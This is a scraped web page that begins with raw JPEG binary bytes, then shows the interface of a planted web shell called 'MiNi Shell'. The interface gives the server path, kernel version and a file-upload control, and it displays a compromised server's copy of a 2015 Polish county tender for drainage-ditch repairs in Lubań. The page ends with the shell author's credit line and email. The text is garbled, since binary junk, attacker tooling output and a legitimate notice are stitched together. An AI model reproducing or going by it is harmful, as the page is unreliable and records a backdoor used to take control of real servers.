JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150914/238974-N-2015.html

<p class="kh_header"><b>Lubań: Remont i udrożnienie rowów melioracyjnych położonych w powiecie lubańskim, na terenie gminy Lubań, 
na działkach stanowiących własność Skarbu Państwa
- obręb Henryków i Radogoszcz</b><br>
<b>Numer ogłoszenia: 238974 - 2015; data zamieszczenia: 14.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lubaniu , ul. Mickiewicza 2, 59-800 Lubań, woj. dolnośląskie, tel. 075 6464340, faks 075 6464321.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatluban.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i udrożnienie rowów melioracyjnych położonych w powiecie lubańskim, na terenie gminy Lubań, 
na działkach stanowiących własność Skarbu Państwa
- obręb Henryków i Radogoszcz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont i udrożnienie rowów melioracyjnych położonych w powiecie lubańskim, na terenie gminy Lubań, na działkach stanowiących własność Skarbu Państwa - obręb Henryków i Radogoszcz.
Rowy przewidziane do remontu są w bardzo złym stanie technicznym. Po silnych opadach w 2013 roku powstały szybkie wezbrania wód, które spowodowały zniszczenia koryta, skarp, ubezpieczeń i budowli hydrotechnicznych. 
II.1. RÓW R-B - OBRĘB RADOGOSZCZ: 
	Dotyczy remontu rowu melioracyjnego R-B oraz jego lewobrzeżnego dopływu nazwanego w dokumentacji rowem R-B/1 (odbiorniki wód powierzchniowych). Omawiany obiekt zlokalizowany jest w miejscowości Radogoszcz, gm. Lubań (działki ewidencyjne nr 129, 130, 177 i R-B/1 dz. nr 110), stanowiący lewobrzeżny dopływ rowu R-B z ujściem do niego w km 0+282,10 a następnie poprzez starorzecze do rzeki Kwisy. Podstawową zasadą odbudowy jest odtworzenie istniejącego koryta z jednoczesnym zwiększeniem przepustowości hydraulicznej. Odtworzone po remoncie, koryto i skarpy ubezpieczone zostaną porostem mieszanek traw. Jest to wystarczające zabezpieczenie skarp  rowu, gdyż dno rowu posiada bardzo mały spadek podłużny i prędkość przepływu wód nie będzie powodować rozmywania dna i skarp. Przed przystąpieniem do remontu, należy dokładnie odwzorować trasę rowu opierając się na widocznych jego śladach. Dokumentacja obejmuje dodatkowo dobudowę przyczółków kamiennych na przepuście oznaczonym na planie jako P3 w km rowu R-B 0+327 - 0+333, oraz na przepuście nr P1/1 na rowie R-B/1 w km 0+226,30 - 0+231,30. Również zaplanowano odbudowę przepustów w miejscach całkowicie zniszczonych, zlokalizowanych na rowie R-B ; przepust P6 w km 0+610,30 - 0+615,30, przepust P7 w km 0+733,20 - 0+738,20,  przepust P8 w km 0+825,80 - 0+830,80, są to przepusty PVC średnicy 800mm, długości 5,0m z przyczółkami z darniny układanej na płask. Pozostałe przepusty są w dobrym stanie technicznym wymagają jedynie odmulenia. Na rowie nie stwierdzono urządzeń piętrzących które wymagają odtworzenia. 
Zakres prac niezbędnych do wykonania remontu zniszczonego rowu R-B obejmować będzie głównie:
I. km 0+000 - 0+211, odcinek długości L=211mb;
Ř	 wykaszanie skarp rowu pasem 5m ;                   pow. 2,0m x 5m x 210m = 2100m2, 
Ř	 wykaszanie dna rowu o szer. dna 2,0m;             pow. 2,0m x 210m = 420m2,
Ř	 wycinka krzaków o poszyciu gęstym;                pow.0,01ha,
Ř	 odmulenie dna rowu ręcznie warstwą 20cm przy szerokości dna 2,0m i głębokości śr. h=1,8m,
Ř	 wywóz namułu na odl. do 5km w ilości 40m3,
Ř	odmulenie przepust P1 w km 0+211 - 0+226, PVC O 600mm dł. L=15m, zamulenie w 30% światła przepustu- przepust w dobrym stanie technicznym,
II. km 0+226 - 0+323,40, odcinek długości L= 97,4mb;
Ř	wykaszanie skarp rowu pasem 2m ;                   pow.  2 x 2m x 97,4m = 3900m2, 
Ř	 wykaszanie dna rowu o szer. dna 1,8m;             pow. 1,8 x97,4 = 175,3m2,
Ř	 wycinka krzaków o poszyciu gęstym;                pow. 0,02ha,
Ř	 odmulenie dna rowu ręcznie warstwą 30cm przy szer. dna 1,8m i głębokości śr. h=1,5m, na dł. 93mb,
Ř	 wywóz namułu na odl. do 5km w ilości 50m3,
Ř	odmulenie przepust P2 w km 0+295 - 0+300,  PVC O 600mm dł. L=6m, zamulenie w 40% światła przepustu (przepust w dobrym stanie technicznym)
III. km 0+323,40 - 0+428, odcinek długości L= 104,6mb;
Ř	wykaszanie skarp rowu pasem 3m ;                   pow.  2 x 3m x 104,6m = 627,6m2, 
Ř	wycinka krzaków o poszyciu gęstym;                pow.  0,02ha,
Ř	 odmulenie dna rowu ręcznie warstwą 30cm przy szer.dna 1,8m i głęb. śr. h=1,5m, na dł. 104,6mb,
Ř	 wywóz namułu na odl. do 5km w ilości 56m3,
Ř	odmulenie przepust P3 w km 0+327 - 0+333,  PVC O 600mm dł. L=6m, zamulenie w 50% światła przepustu (przepust w dobrym stanie technicznym),
Ř	dobudowa przyczółków z kamienia granitowego foremnego układanego na zaprawie cementowej (ilość kamienia 6m3),
Ř	wykonanie fundamentu z betenu klasy C20/25 w ilości 4m3,
Ř	wykop mechaniczny z wywozem na odległość do 5km w ilości 14m3,
Ř	tłuczeń na część jezdną w ilości 12m3,
IV. km 0+428 - 0+433, odcinek długości L= 5,0mb;
Ř	odmulenie przepust P4 w km 0+327 - 0+333,  PVC O 500mm dł. L=5m, zamulenie w 70% światła przepustu (przepust z przyczółkami kamiennymi, całość w dobrym stanie technicznym),
V. km 0+433 - 0+565, odcinek długości L=223mb;
Ř	wykop mechaniczny z transportem urobku na odległ.do 5km, w gruncie kat. III, parametry docelowe przekroju koryta; szer.w dnie b=1,8m, gł. h=1,5m, nachylenie skarp 1:n=1:1,5, pow. przekroju poprzecznego 6,08m2 ,
Ř	istniejące zamulenie koryta 60%,
Ř	długość odcinka rowu do wykopu od 0+433 do km 0+560 czyli dł. L=127mb,
Ř	kubatura wykopu 6,08m2x 60% x 127mb = 457m3,
Ř	odmulenie przepust P5 w km 0+560 - 0+565,  PVC O 600mm dł. L=5m, zamulenie w 70% światła przepustu- przepust z przyczółkami kamiennymi, całość w dobrym stanie technicznym,
VI. km 0+565 - 0+976, odcinek długości L=411mb;
Ř	wykop mechaniczny z transportem urobku na odległ.do 5km, w gruncie kat. III, parametry docelowe przekroju koryta; szer.w dnie b=1,2m, głęb.h=1,5m, nachylenie skarp 1:n=1:1,5, pow. przekroju poprzecz.5,2m2 ,
Ř	istniejące zamulenie koryta 60%,
Ř	długość odcinka rowu do wykopu od 0+560 do km 0+976 czyli dł. L=411mb,
Ř	kubatura wykopu 5,2m2x 60% x 411mb = 1274,1m3,
VII. km 0+610,30 - 0+615,30, odcinek długości L=5,0mb; przepust P6
Ř	 wykonanie nowego przepust P6 PVC O 800mm dł.L=5,0mb, z przyczółkami z darniny układanej na płask,
Ř	 rury PVC O 800mm, L=5m,
Ř	 darnina 10m2,
VIII. km 0+733,20 - 0+738,20, odcinek długości L=5,0mb; przepust P7
Ř	wykonanie nowego przepust P6 PVC O 800mm dł. L=5,0mb, z przyczółkami z darniny układanej na płask,
Ř	 rury PVC O 800mm, L=5m,
Ř	 darnina 10m2,
IX. km 0+825,80 - 0+830,80, odcinek długości L=5,0mb; przepust P8
Ř	wykonanie nowego przepust P6 PVC O 800mm dł. L=5,0mb, z przyczółkami z darniny układanej na płask,
Ř	 rury PVC O 800mm, L=5m,
Ř	 darnina 10m2,
X. km 0+970,30 - 0+976,30, odcinek długości L=6,0mb; przepust P9,
Ř	odmulenie przepust P9,  PVC O 600mm dł. L=6m, zamulenie w 70% światła przepustu- przepust z przyczółkami kamiennymi, całość w dobrym stanie technicznym,
XI. km 0+976 - 1+292, odcinek długości L=316mb;
Ř	wykop mechaniczny z transportem urobku na odległość do 5km, w gruncie kat. III, parametry docelowe przekroju koryta; szer.w dnie b=1,2m, gł.h=1,5m, nachylenie skarp 1:n=1:1,5, pow. przekroju poprzecz. 5,2m2 ,
Ř	istniejące zamulenie koryta 50%,
Ř	długość odcinka rowu do wykopu od 0+976 do km 1+292 czyli dł. L=316mb,
Ř	kubatura wykopu 5,2m2x 50% x316 = 821,6m3,
XII. km 1+084 - 1+089, odcinek długości L=5,0mb; przepust P10
Ř	 wykonanie nowego przepust P6 PVC O 800mm dł. L=5,0mb, z przyczółkami z darniny układanej na płask,
Ř	 rury PVC O 800mm, L=5m,
Ř	 darnina 10m2,
XIII. km 1+277,20 - 1+292,20, odcinek długości L=5,0mb; przepust P11,
Ř	odmulenie przepust P11,  PVC O 600mm dł. L=15m, zamulenie w 80% światła przepustu- przepust z przyczółkami kamiennymi, całość w dobrym stanie technicznym,
XIV. km 1+292 - 1+371,30, odcinek długości L=79mb;
Ř	wykop mechaniczny z transportem urobku na odległość do 5km, w gruncie kat. III, parametry docelowe przekroju koryta; szer. w dnie b=1,0m, gł. h=1,8m, nachylenie skarp 1:n=1:1,5, pow.przekroju poprzecz. 6,66m2 ,
Ř	istniejące zamulenie koryta 50%,
Ř	długość odcinka rowu do wykopu od 1+292 do km 1+371,30 czyli dł. L=79mb,
Ř	kubatura wykopu 6,66m2x 50% x79m = 263,1m3,
XV. km 0+300 - 1+400, odcinek długości L=1100mb;
Ř	wykaszanie skarp na odcinku 1400m pasem szerokości średnio 7,0m, powierzchnia F= 7700m2,
XVI. km 0+300 - 1+371, odcinek długości L=1071mb;
Ř	ręczne plantowanie skarp i dna rowu pasem szerokości średnio 3,5m,
Ř	powierzchnia plantowania 1071mb x 2 x 3,5m = 7497m2,
XVII. km 0+300 - 1+400, odcinek długości L=1100mb;
Ř	 obsiew skarp i terenu wzdłuż rowu nasionami traw o powierzchni 10.ooom2.
II.2. RÓW R-B/1 - OBRĘB RADOGOSZCZ: 
Dotyczy remontu rowu R-B/1 lewobrzeżnego dopływu rowu melioracyjnego o nazwie R-B. Są to odbiorniki wód powierzchniowych. W wyniku nawalnych opadów atmosferycznych i powodzi w czerwcu i lipcu 2013roku nastąpiło zamulenie koryta rowu w 60-70%. Zamulone i z licznymi wyrwami w skarpach koryto cieku, przestało spełniać swoją rolę i prawidłowo odprowadzać wody powierzchniowe. Następuje sukcesywne zarastanie i zamulanie urządzeń takich jak przepusty oraz samego koryta rowu. W wyniku tego następuje sukcesywne podtapianie przyległych terenów, zabudowań i dróg. Przyczynia się ten zły stan techniczny cieku do powstawania kolejnych zagrożeń powodziowych. Udrożnienie rowu poprzez polepszenie parametrów hydraulicznych jest niezbędne i powinno być wykonywane niemalże natychmiast. Omawiany obiekt - rów melioracyjny o nazwie R-B/1, przewidziany do remontu  zlokalizowany jest  w miejscowości Radogoszcz, gm. Lubań leżący na działce ewidencyjnych nr 110, obręb Olszyna stanowiący lewobrzeżny dopływ rowu R-B z ujściem do niego w km 0+282,10 a następnie poprzez starorzecze do rzeki Kwisy.
Zakres prac niezbędnych do wykonania remontu zniszczonego rowu R-B/1 obejmować będzie głównie:
I. km 0+000 - 0+300 odcinek dł. 300m
Ř	 remont istniejącego przepust P1/1, w km 0+226,30-0+231,30 poprzez przedłużenie rurociągu O 1500mm o 1,5m oraz budowa nowych przyczółków z kamienia granitowego foremnego układanego na zaprawie cementowej,
Ř	 montaż przepustów O1000mm dł. 1,5m,
Ř	 ilość kamienia murowego 2 x 3,9m3 = 7,8m3,
Ř	 ilość betonu na fundamentu 2 x 2,3m3 = 4,6m3,
Ř	palisady z kołków śr. 7-9cm i dł. 1,1m, długość palisady 3,2mb,
Ř	narzut kamienny z kamienia ciężkiego przed przepustem na dł. 4m i za przepustem 6m warstwą gr. 20cm, kamień średnicy 80/120 w ilości 2m3,
Ř	wykop mechaniczny w gr. kat. III z wywozem na odl. do 5km w ilości 15m3,  
Ř	odmulenie dna rowu ręcznie warstwą 30cm przy szerokości dna 1,0m i głębokości śr. h=1,0m, na odcinku od km 0+000 do km 0+300m, dł. 300mb,
Ř	 wycinka krzaków gęstych , pow. 0,2ha,
Ř	wywóz urobku na odl. do 5km w ilości 80m3,
Ř	wycinka i karczowanie drzew średnicy 50cm w ilości 3szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.64.00-7, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga  się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.	Wykonawca  w cenie oferty winien uwzględnić:
- wykonanie i uzyskanie zatwierdzenia projektu organizacji ruchu tymczasowego na czas prowadzonych robót przez organ zarządzający ruchem na drogach, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.09.2003r. (Dz.U. Nr 177 z dnia 14.10.2003r., poz. 1729) w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem.
- wywóz i złożenie urobku ze ścinki i korytowania.

	Opis przedmiotu zamówienia należy wykonać zgodnie z obowiązującymi przepisami, sztuką budowlaną, Specyfikacjami Technicznymi oraz zaleceniami podanymi w Specyfikacji Istotnych Warunków Zamówienia (SIWZ). 
	U W A G A: 1.	Wykonawca bierze na siebie obowiązek ewentualnej lokalizacji oraz uzgodnień z właścicielami urządzeń obcych znajdujących na gruncie stanowiącym przedmiotem zamówienia oraz ponosi konsekwencje ewentualnych ich uszkodzeń a także wszelkich koniecznych uzgodnień z właścicielami gruntów przyległych do terenu będącego  przedmiotem zamówienia.
2.Zakres robót został sporządzony dla całości inwestycji. Do wykorzystania jest w części obejmującej zakres dotyczący etapu ujętego w przedmiotowej Specyfikacji Istotnych Warunków Zamówienia.
Ocena spełniania przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia i dokumenty, o których mowa w punkcie 8 niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wyboru Wykonawcy, Wykonawca zobowiązuje się do ubezpieczenia robót, obiektów, budowli od ognia, powodzi, huraganu i innych zdarzeń losowych na kwotę nie mniejszą iż wartość robót wynikająca z treści umowy.
W przypadku braku polisy ubezpieczenia robót, obiektów, budowli od ognia, powodzi, huraganu i innych zdarzeń losowych Zamawiający dopuszcza przedłożenie przez Wykonawcę stosownej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej zdolność kredytową wykonawcy na kwotę nie mniejszą niż wartość robót wynikająca ze składanej oferty, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia wraz z pisemnym oświadczeniem o przejęciu odpowiedzialności z w/w tytułu przez Wykonawcę.
Warunkiem podpisania umowy będzie przekazanie Zamawiającemu dokumentów potwierdzających zawarcie stosownych umów i dowodów uiszczenia składek.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiatluban.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lubaniu ul. Mickiewicza 2 59-800 Lubań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 10:00, miejsce: Sekretariat  Starostwa Powiatowego w Lubaniu ,ul. Mickiewicza 2, 59-800 Lubań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com